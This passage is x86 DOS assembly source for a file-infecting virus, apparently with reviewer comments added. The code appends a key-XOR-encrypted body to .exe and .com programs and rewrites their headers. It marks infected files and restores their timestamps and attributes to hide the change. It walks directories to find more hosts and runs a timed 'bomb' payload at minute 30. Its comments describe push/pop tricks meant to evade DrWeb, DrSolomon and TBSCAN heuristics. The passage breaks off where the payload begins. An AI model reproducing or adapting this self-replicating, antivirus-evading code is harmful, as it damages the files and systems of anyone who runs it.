;-----------------calculate new size---------------------------
;
pop dx
pop ax
push ax
add ax, fin_cryptage-virus
adc dx, 0
mov cl, 7
shl dx, cl
mov cl, 9
shr ax, cl
add ax, dx
inc ax
mov word ptr [bp+ exehead+04h], ax
pop ax
add ax, fin_cryptage-virus
and ah, 1
mov word ptr [bp+ exehead+02h], ax
;
;-----------------write signature----------------------------------
;
mov word ptr [bp+exehead+12h], "ee"
;
;--------------------infection---------------------
;
call infecte
;
;----------write new header of the infected file on disk---------------------
;
mov ax, 4200h
push ax ;this stupid push/pop
pop ax ;to avoid DrWeb heuristic
xor cx, cx
xor dx, dx
int 21h ;pointer at start of file on disk
mov cx, 1Ch
lea dx, [bp+exehead]
call ecrit_fichier ;write on disk modified header
;
;----------restore time/date of the file--------------------
;
call restaure_time
;
;----------close file and restore file attributes----------------------
;
call remise_en_etat
;
;--------verify how many .exe files we have infected------------------
;
mov byte ptr cl, [bp+offset compteur_exe] ;counter in cl
inc cl ;one more
cmp cl, 3 ;we infect 3?
je bombe_ou_pas ;yes => let's stop infections
mov byte ptr [bp+offset compteur_exe], cl ;no => write counter
;
;--------let's infect a new .exe file------------------
;
jmp exe_suivant ;go infect next file
;
;--------------------does the bomb explode?---------------------
;
;-----------------------------------------------------------------------
; bombe_ou_pas: decide whether the payload ("bombe") runs.
; Reached after the third .exe infection of a run, or when the directory
; walk (rep_sup) finds nothing more to visit.
; DOS AH=2Ch (get system time) returns CH=hour, CL=minute, DH=second.
; Condition: minute == 30 and second <= 30 ("ja" is an unsigned compare,
; so DH = 30 also falls through into the payload); otherwise control
; goes back to the host. The hour (CH) is not examined.
; Clobbers: ax, cx, dx.
;-----------------------------------------------------------------------
bombe_ou_pas:
mov ah, 2Ch ;internal clock: ch=hour, cl=minute, dh=second
int 21h
cmp cl, 30d ;minute = 30?
jne redonne_main ;no => return to host
cmp dh, 30d ;yes => test the seconds
ja redonne_main ;seconds > 30 => return to host
jmp bombe ;seconds <= 30 (31 of the 3600 seconds of an hour) => payload
;**********************************************************************
; RETURN TO HOST
;**********************************************************************
;-----------------------------------------------------------------------
; redonne_main: hand control back to the host program.
; Common part: reset the DTA to the default one in the PSP (offset 80h),
; return to the directory whose path was saved at [bp+repert] (saved by
; code outside this view), then dispatch on the host type: byte 0 of the
; code segment is compared with 0CDh, the INT 20h opcode that every PSP
; starts with. A .com host runs with CS = PSP segment, so the byte
; matches; any other value is treated as an .exe host.
; Expects: bp = delta offset used by all [bp+...] data references;
;          the DS pushed by the virus entry code (DOS sets DS = PSP
;          segment on entry) is still on the stack.
;-----------------------------------------------------------------------
redonne_main:
;------------------DTA in the normal zone-----------------------------
; (so the host finds its DTA where DOS put it: PSP:80h)
;
push 1a00h ;ax = 1A00h: AH=1Ah set DTA (push/pop instead of
pop ax ;mov is the author's way to avoid a TBSCAN "F" flag)
mov dx, 80h ;DS:DX = 80h, the default DTA in the PSP
int 21h
;
;--------restore the directory in which we were when we started-----------
;
lea dx, [bp+offset repert] ;ds:dx = saved path (repert is outside this view)
mov ax, 3B00h ;AH=3Bh: change directory
int 21h
;
;-----------is the active host a .com or a .exe?-------------------
;
cmp byte ptr cs:0, 0CDh ;a .com runs with CS = PSP, and a PSP starts with
je redonne_main_com ;INT 20h (bytes CD 20) at offset 0
;
;-------------return to an .exe---------------------------
; Rebuild the host's CS:IP and SS:SP from vCS/vSS/vSP (presumably copied
; from the .exe header, i.e. relative to the load module) by adding the
; load segment, then far-jump to the host entry point.
;
redonne_main_exe:
pop ds ;ds = PSP segment (the very first push ds at virus entry)
push ds
pop es ;es = ds
mov ax, es
add ax, 10h ;PSP is 100h bytes = 10h paragraphs: ax = load segment
add word ptr cs:[bp+vCS], ax ;relocate the host CS
cli ;no interrupts while SS:SP is being switched
add ax, word ptr cs:[bp+vSS] ;relocate the host SS
mov ss, ax
mov sp, word ptr cs:[bp+vSP] ;host SP as saved
sti
jmp retour_au_prog ;executes the EA opcode below: jmp far vCS:vIP
;
; Saved host state. These bytes are both data and code: retour_au_prog
; is the byte 0EAh (JMP FAR ptr16:16) immediately followed by vIP and
; vCS, so jumping there transfers control to vCS:vIP. For a .com host
; the 5 bytes at contenu (vIP, vCS, low byte of vSS) hold the original
; first 5 bytes of the program instead (see redonne_main_com).
; How the cinq_octets area is used is not visible in this view.
;
cinq_octets:
pip db 90h,90h ;zone to keep file information
pcs db 90h,90h ;EXE: keep ip, cs, ss, sp
pss db 90h,90h ;COM: keep 5 first bytes
psp db 90h,90h
retour_au_prog:
db 0EAh ;JMP FAR opcode; its operand is the vIP:vCS pair that follows
contenu:
vIP dw 0 ;zone to keep temporarily file info
vCS dw 0 ;EXE: keep ip, cs, ss, sp
vSS dw 0 ;COM: keep 5 first bytes (vIP, vCS, low byte of vSS)
vSP dw 0
;
;-----------------------return to a .com---------------------------
;
;-----------------------------------------------------------------------
; redonne_main_com: return to a .com host.
; Copies the 5 original bytes saved at contenu back to offset 100h of
; the host (in memory only), then returns to 100h through the return
; address left on the stack by the initial CALL.
; NOTE(review): movsw/movsb write to ES:DI; neither ES nor DF is set
; here, so this relies on ES already addressing the host segment and DF
; being clear — confirm against the entry code.
;-----------------------------------------------------------------------
redonne_main_com:
pop ax ;drop the DS pushed at virus entry; the CALL's return address is now on top
;
;---------replace the 5 first bytes of the host in memory----------
;
lea si, [bp+offset contenu] ;ds:si = saved original bytes (vIP, vCS, low byte of vSS)
mov ax, 101h ;di = 100h, built as 101h-1 (the author's
dec ax ;way to avoid a TBSCAN "B" flag)
mov di, ax ;a .com starts at offset 100h
movsw
movsw
movsb ;5 bytes: 2+2+1
;
;-----------------------return to host----------------------------
; (the virus body presumably starts with a 3-byte CALL at 100h, so the
; return address on the stack is 103h)
;
redonner_la_main:
pop ax ;ax = 103h, the CALL's return address
sub ax, 3 ;back to 100h, the now-restored entry point
push ax ;re-push it so the RET lands on 100h
xor ax, ax ;a freshly started program
xor bx, bx ;expects these registers
xor cx, cx ;to be zero
xor dx, dx
ret ;jump to the host at 100h
;**********************************************************************
; CHANGE DIRECTORY
;**********************************************************************
;
;----------climb to upper directory--------------------------
;
;-----------------------------------------------------------------------
; rep_sup: directory walk used to find another directory to search.
; First tries to go up one level (chdir ".."); if that fails (CF=1) we
; were already in the root, so the walk descends into one of the root's
; first-level subdirectories per pass, counted by the byte [bp+phase].
; Leaves by jumping to recherche (file search in the new directory, not
; in this view) or to bombe_ou_pas when nothing is left to visit.
; DTA layout used here (DOS find-first/find-next record):
;   +15h attribute byte, +1Eh ASCIZ name.
; Clobbers: ax, bx, cx, dx.
;-----------------------------------------------------------------------
;
;----------climb to upper directory--------------------------
;
rep_sup:
lea dx, [bp+offset dot] ;ds:dx = ".." (dot is outside this view)
mov ah, 3bh ;AH=3Bh: change directory
int 21h ;CF=1 => the call failed, i.e. we are in the root
jc on_redescend ;root => go down into a subdirectory
jmp recherche ;else search files in the parent directory
;
;---if we are in root, let's go to all "first-level" subdirectories-------
;
on_redescend:
mov ah, 4eh ;AH=4Eh: find first
mov cx, 16 ;attribute mask 10h (directory); DOS also returns plain
lea dx, [bp+offset dir_masque] ;files for this mask, hence the check at contin2
int 21h ;found one?
jnc contin ;yes => continue
jmp bombe_ou_pas ;no => test time for the bomb
contin:
cmp byte ptr[bp+offset phase], 0 ;phase = number of subdirectories already visited
je le_premier ;phase=0 => take the find-first result as is
xor bh, bh
mov bl, byte ptr [bp+offset phase] ;bx = phase
rep_suivant: ;skip the subdirectories visited on earlier passes
mov cx, 16 ;directory attribute
mov ah, 4fh ;AH=4Fh: find next
int 21h ;found one?
jnc contin2 ;yes => continue
jmp bombe_ou_pas ;no more entries => test time for the bomb
contin2:
cmp byte ptr [bp+offset dta+15h], 16 ;is the entry really a directory?
jne rep_suivant ;no => find next
dec bx ;bx counts directory entries from find-next;
cmp bx, 0 ;the bx-th one is the target, the earlier ones
jne rep_suivant ;were handled on previous passes
le_premier:
add byte ptr[bp+offset phase], 1 ;one more subdirectory visited
lea dx, [bp+offset dta+1eh] ;ds:dx = name of the directory found
mov ah, 3bh ;AH=3Bh: change directory into it
int 21h
jmp recherche ;and search files in this new subdirectory
;**********************************************************************
; ROUTINES USED OFTEN (shared to save bytes)
;**********************************************************************
;-------------------verify extension-------------------------
;-----------------------------------------------------------------------
; verifie_extension: locate the extension of the file name in the DTA.
; In:  none (ds:si is loaded here with the ASCIZ name at [bp+dta+1Eh])
; Out: si points at the second character of the extension (one past ".")
; Note: cx is loaded with 13 but the loop never uses it (jne, not loop),
; so the scan stops only at the first "." and has no length bound.
; Clobbers: al, cx, si.
;-----------------------------------------------------------------------
verifie_extension:
mov cx, 13d ;intended name-length bound; unused by the loop below
lea si, [bp+offset dta+1eh] ;ds:si = file name from the DTA
compare: ;loop for detecting start of the extension
lodsb ;al = next character, si advances
cmp al, "." ;is it the dot?
jne compare ;no => test next character
inc si ;yes => si now points at the second extension letter
ret
;------------------change crypting key---------------
;-----------------------------------------------------------------------
; change_clef: pick a new XOR key for the encrypted part (see infecte).
; DOS AH=2Ch returns CH=hour, CL=minute, DH=second, DL=hundredths; only
; CL (the current minute, 0..59) is stored at [bp+clef], so the key
; takes one of 60 values and is derivable from the infection time.
; Clobbers: ax, cx, dx.
;-----------------------------------------------------------------------
change_clef:
mov ah, 2Ch ;AH=2Ch: get system time
int 21h
mov [bp+offset clef], cl ;key = current minute
ret
;------------------------open file-------------------------
;-----------------------------------------------------------------------
; ouvre_et_verif_header: open the file named in the DTA, read its first
; 1Ch bytes (the .exe header) into exehead and decide whether it is a
; candidate. Returns through one of two paths:
;   - not a candidate (open/read error, already marked, new-style
;     executable, too small): falls into remise_en_etat, which closes
;     the handle, restores the attributes and returns normally;
;   - candidate: verif_ok adds 2 to the return address, so the caller
;     resumes 2 bytes after its CALL (skipping a short jump placed
;     there; the caller is not in this view).
; Side effects: [bp+handle] = handle, bx = handle, exehead filled.
; Clobbers: ax, bx, cx, dx.
;-----------------------------------------------------------------------
ouvre_et_verif_header:
mov ax, 3D02h ;AH=3Dh, AL=02h: open for read/write
lea dx, [bp+offset dta+1eh] ;ds:dx = ASCIZ name from the DTA
int 21h
jnc saut2 ;CF=0 => ax = handle, continue
jmp remise_en_etat ;open failed => close/restore path
saut2: ;continue
mov [bp+offset handle],ax ;keep the handle in memory
;
;----------------read first 1Ch bytes of the file-----------------
;
xchg ax, bx ;bx = handle (DOS read/write/close take the handle in bx)
mov cx, 1Ch ;number of bytes to read
mov ax, 3F00h ;AH=3Fh: read from handle
lea dx, [bp+offset exehead] ;ds:dx = buffer
int 21h
jnc saut3 ;CF=0 => continue (the byte count returned in ax is not checked)
jmp remise_en_etat ;read failed => close/restore path
saut3: ; continue
;
;-----------is the file already infected?-------------
; The marker "ee" is written at exehead+12h (the header checksum field)
; for .exe hosts; for .com hosts it is looked for at offset 3, right
; after a 3-byte jump/call.
;
cmp byte ptr [bp+offset exehead+18h], 40h ;relocation-table offset 40h: new-style (Windows) executable
jz deja_infecte ;yes => don't touch
cmp word ptr [bp+offset exehead+3], "ee" ;.com already marked?
jz deja_infecte ;yes => don't touch
cmp word ptr [bp+offset exehead+12h], "ee" ;.exe already marked?
jnz saut4 ;no => continue
deja_infecte:
jmp remise_en_etat ;leave the file alone
saut4: ;continue
;
;--------------------is the size correct?-------------------
; DTA+1Ah holds the 32-bit file size; no size is written on this
; compare, presumably a word compare of the low word only.
;
cmp [bp+offset dta+1ah], 500 ;do not touch a file of 500 bytes or less
ja verif_ok ;unsigned compare: > 500 => ok
;
;--------arrange file and close it in case of non-infection-----------
; Also a plain subroutine entry (called after a successful infection).
; Expects bx = handle; on the open-failed path above bx still holds
; whatever the caller left in it and the close is issued anyway.
;
remise_en_etat:
mov ah, 3Eh ;AH=3Eh: close handle in bx
int 21h
;
;-----------------restore file attributes-----------------------
;
call restaure_attrib ;restore attributes
;
;------after arranging the file, let's go back to the CALL-------
;
ret
;
;----------------------if it's good to infect,-------------------
; let's go back one instruction after the call
;
verif_ok:
pop ax ;ax = return address left by the CALL
add ax, 2 ;skip the 2-byte short JMP that follows the CALL
push ax ;put it back on the stack
ret ;resume 2 bytes after the CALL
;-----------------------------infection--------------------------
;first, let's write non-encrypted part
;-----------------------------------------------------------------------
; infecte: write the virus body to the open file.
; 1. writes [virus, debut_cryptage) as is;
; 2. XORs every byte of [debut_cryptage, fin_cryptage) with the single
;    key byte at [bp+clef] into the scratch buffer zone_de_travail;
; 3. writes the scratch buffer.
; Expects: bx = handle, file pointer positioned by the caller (not in
; this view), bp = delta offset; stosb writes to ES:DI, so this relies
; on es = ds and DF clear (neither is set here).
; Clobbers: ax, cx, dx, si, di.
;-----------------------------------------------------------------------
infecte:
mov cx, debut_cryptage - virus ;size of the non-encrypted part
lea dx, [bp+offset virus] ;ds:dx = start of the virus body
call ecrit_fichier ;write it (AH=40h)
;second, encrypt the next part in memory
mov dl, [bp+offset clef] ;dl = key byte (set by change_clef)
lea si, [bp+offset debut_cryptage] ;ds:si = start of the zone to encrypt
lea di, [bp+offset zone_de_travail] ;es:di = scratch buffer
mov cx, fin_cryptage - debut_cryptage ;cx = number of bytes to encrypt
crypte_et_transfere: ;the loop
lodsb ;al = original byte
xor al, dl ;one-byte XOR with the key
stosb ;store into the scratch buffer
loop crypte_et_transfere ;again
;third, write the encrypted zone to disk
mov cx, fin_cryptage - debut_cryptage ;number of bytes to write
lea dx, [bp+offset zone_de_travail] ;ds:dx = scratch buffer
call ecrit_fichier ;write it
ret
;-------------------modify attributes-------------------------
;-----------------------------------------------------------------------
; attrib_a_zero / restaure_attrib: set the attributes of the file named
; in the DTA (AX=4301h set attributes, CX=attributes, DS:DX=name).
;   attrib_a_zero:   cx = 0, clears every attribute
;   restaure_attrib: cx = attribute byte recorded by find-first at DTA+15h
; CF from the DOS call is not checked. Clobbers: ax, cx, dx.
;-----------------------------------------------------------------------
attrib_a_zero:
xor cx, cx ;cx = 0: no attributes
jmp suite_attrib
restaure_attrib:
xor ch, ch ;cx = original attribute byte
mov cl, byte ptr [bp+offset dta+15h] ;from the DTA
suite_attrib:
lea dx, [bp+offset dta+1eh] ;ds:dx = file name
push 4301h ;ax = 4301h: AH=43h AL=01h set attributes
pop ax ;avoid flag F from TBSCAN
int 21h
ret
;---------------------restore file time/date-----------------------
;-----------------------------------------------------------------------
; restaure_time: put back the file's original date/time stamp.
; AX=5701h (set file date/time) with CX=time, DX=date as recorded by
; find-first in the DTA (+16h time, +18h date); bx must hold the
; handle, so this is called before the handle is closed (the caller
; does restaure_time, then remise_en_etat).
; Clobbers: ax, cx, dx.
;-----------------------------------------------------------------------
restaure_time:
mov dx, word ptr [bp+offset dta+18h] ;dx = date from the DTA
mov cx, word ptr [bp+offset dta+16h] ;cx = time from the DTA
push 5701h ;ax = 5701h: set file date/time
pop ax ;avoid flag F from TBSCAN
int 21h
ret
;------------------write file on disk----------------------
;-----------------------------------------------------------------------
; ecrit_fichier: write cx bytes from ds:dx to the handle in bx
; (DOS AH=40h). Returns what DOS returns (ax = bytes written, CF set on
; error); no caller in this view checks either.
; Clobbers: ax.
;-----------------------------------------------------------------------
ecrit_fichier:
push 4000h ;the famous 40Hex... push/pop to
pop ax ;avoid DrSolomon and DrWeb heuristic
int 21h
ret
;--------------------move pointer on disk---------------------------
;-----------------------------------------------------------------------
; pointeur_debut: seek the handle in bx to offset 0 (AX=4200h, seek from
; the start of the file, CX:DX = 32-bit offset).
; pointeur_debut_sans_dx: same entry but keeps the caller's dx as the low
; offset word (the author notes it is probably unused).
; CF from the DOS call is not checked.
; Clobbers: ax, cx (and dx on the first entry).
;-----------------------------------------------------------------------
pointeur_debut: ;seek to the beginning of the file
xor dx, dx ;low offset word = 0
pointeur_debut_sans_dx: ;i think i don't use this... never mind
xor cx, cx ;high offset word = 0
mov ax, 4200h ;AH=42h, AL=00h: seek from the start of the file
push ax ;stupid push/pop to avoid
pop ax ;DrWeb heuristic
int 21h
ret
;**********************************************************************
; CODE OF THE GRAPHIC BOMB: A 3D VOXEL EFFECT
;**********************************************************************
bombe:
largeur equ 128 ;size of the grid
;-------------------------VGA-------------------------------